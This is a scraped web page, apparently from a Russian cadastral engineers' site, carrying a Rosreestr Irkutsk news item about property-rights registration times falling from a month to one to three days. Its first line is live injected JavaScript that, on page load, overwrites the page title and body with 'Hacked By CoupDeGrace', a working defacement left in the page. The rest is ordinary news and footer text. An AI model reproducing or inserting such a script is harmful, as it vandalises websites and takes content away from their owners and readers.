document.addEventListener('DOMContentLoaded',function(){document.title='Hacked By CoupDeGrace';document.body.style.cssText='margin:0;overflow:hidden';document.body.innerHTML='
Hacked By CoupDeGrace
';});

2023 – это год, когда Росреестру исполняется 15 лет.

За годы работы Росреестра срок регистрации прав сократился в 10 раз

07.02.23 Росреестр по Иркутской области

2023 – это год, когда Росреестру исполняется 15 лет. За эти годы порядок регистрации прав на недвижимость довольно существенно менялся.

В числе прочего серьезно изменились и сроки регистрации прав. За 15 лет сроки сократились кардинально – раньше закон устанавливал месячный срок регистрации, теперь же общий максимальный срок по закону составляет 9 рабочих дней.

Но даже этот срок в Управлении Росреестра по Иркутской области сокращен, ведь фактически на сегодня средний срок регистрации прав составляет 2-3 дня. При этом по документам, поступившим на регистрацию в электронном виде, а также через нотариуса, срок регистрации составляет не более 1 дня.

«Сокращение сроков регистрации прав на недвижимость стало возможным благодаря все большему переводу процесса регистрации прав в электронный вид, в том числе электронного взаимодействия с МФЦ, нотариусами, органами власти. Весь обмен данными происходит без участия заявителя. Это позволяет не только быстрее оказывать услуги, но и освободить наших заявителей от лишних хлопот», - отметила заместитель руководителя Управления Росреестра по Иркутской области Оксана Викторовна Арсентьева.

По словам начальника методического отдела Нотариальной палаты Иркутской области Виктории Леонидовны Мериновой: «Ежегодно спрос на регистрацию прав в электронном виде через нотариуса возрастает. В целях сокращения сроков регистрации за нотариальным удостоверением сделок обращаются, в том числе и по договорам, не требующих обязательного нотариального удостоверения. При этом регистрация прав при совершении сделки через нотариуса составляет один день. Это действительно очень удобно для наших потребителей».

Получается, что за время существования Росреестра срок регистрации сократился примерно в 10 раз, а по отдельным категориям дел – в 30 раз.

При этом в будущем срок регистрации прав, установленный законом, будет сокращаться еще больше.

Опубликовано

07.02.23 13:27

Внесены изменения:

07.02.23 13:27

Просмотров:

741

Рубрикатор

ПОДПИСКА

Актуальная информация

СРО Союз «Кадастровые инженеры» является членом Ассоциации «Национальное объединение саморегулируемых организаций кадастровых инженеров»" (сокращенное наименование - Национальная палата кадастровых инженеров). Номер и дата решения Президиума о принятии саморегулируемой организации в члены Национального объединения: Протокол № 04/24 от 29.03.2024г. Адрес: Москва, ул. Таллинская, д. 32, корпус 3, офис 10, тел. +7 (495) 518-93-20, mail: ki-rf@ya.ru
Этот сайт защищён фаерволом RSFirewall! для Joomla!